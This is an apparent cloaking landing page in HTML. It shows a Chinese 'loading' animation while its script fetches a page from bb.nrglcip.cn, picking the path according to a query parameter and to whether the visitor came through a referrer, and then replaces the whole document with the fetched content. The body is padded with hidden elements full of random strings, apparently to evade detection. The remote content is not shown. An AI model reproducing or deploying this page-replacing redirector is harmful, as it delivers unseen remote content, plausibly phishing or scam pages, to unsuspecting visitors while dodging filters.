<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GDrw7JV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GDrw7JV .IimWIZVtxnp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GDrw7JV .content {
            line-height: 50px;
            text-align: center
        }

        .GDrw7JV .img {
            width: 100%
        }

        .GDrw7JV .HHpMsyQ {
            text-align: center
        }

        .GDrw7JV .HHpMsyQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GDrw7JV .HHpMsyQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GDrw7JV .HHpMsyQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GDrw7JV .HHpMsyQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GDrw7JV .HHpMsyQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GDrw7JV .HHpMsyQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GDrw7JV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iK17tCFqksP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OcGTubA = iK17tCFqksP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OcGTubA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OcGTubA +".html?a=share";
		}
		
        QwfJfTRyzk=url+"#"+new Date().getTime();
        QwfJfTRyzk && function() {
            $.get(QwfJfTRyzk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>KisQDHUX5HjiwMYIIvsHYSEtDa9yjmi</div>
<h1 style='display:none' >AAAv6vF4rYmmoTLac2ugRe5MDuxGQjdl8tGKJBv8C</h1>
<h1 style='display:none' >AAAv6vF4rYmmoTLac2ugRe5MDuxGQjdl8tGKJBv8C</h1>
<span style='display:none'>CVSGSLWwJdbfMC9w9D8MsNG6HA45UqB7qjBti</span>
<p  style='display:none'>FQFNwvjl5ylVyrVB1P51vfs0MzY2PRTmkQDfBdblbu6MI</p>
<h1 style='display:none' >AAAv6vF4rYmmoTLac2ugRe5MDuxGQjdl8tGKJBv8C</h1><div class="GDrw7JV">
    <div class="IimWIZVtxnp">
        <div class="HHpMsyQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>FVDxLOxQOPvJHyTBWEIbZCTsjsMSgDG89WKn0</span>
<h1 style='display:none' >oi9cgTC1irbTfNaehitpDLIYZ31DbhxnG4gfI8lwjSKtGKGIoVme7gaKgdbw1SrJ0wiETMb40l2easck0</h1>
<div style='display:none'>NCJM6FgztTufDqkRPfi</div>
<ul style='display:none' >mOthS7fzjUi412M5MZYQABAend8ZMs6jmXPEPD2Hg02L49PdWcKmjTHgNxy7yABVEkHnx6sxq4l20d4P</ul>
<b style='display:none' >mCwQHBPf2758AFzu0QoNRm7dbZgHzrRgjeJgBWhj57KVHyN73Yj3xZRb90y39X2</b>
<ul style='display:none' >mOthS7fzjUi412M5MZYQABAend8ZMs6jmXPEPD2Hg02L49PdWcKmjTHgNxy7yABVEkHnx6sxq4l20d4P</ul>
<img  src='' style='display:none'></body>
</html>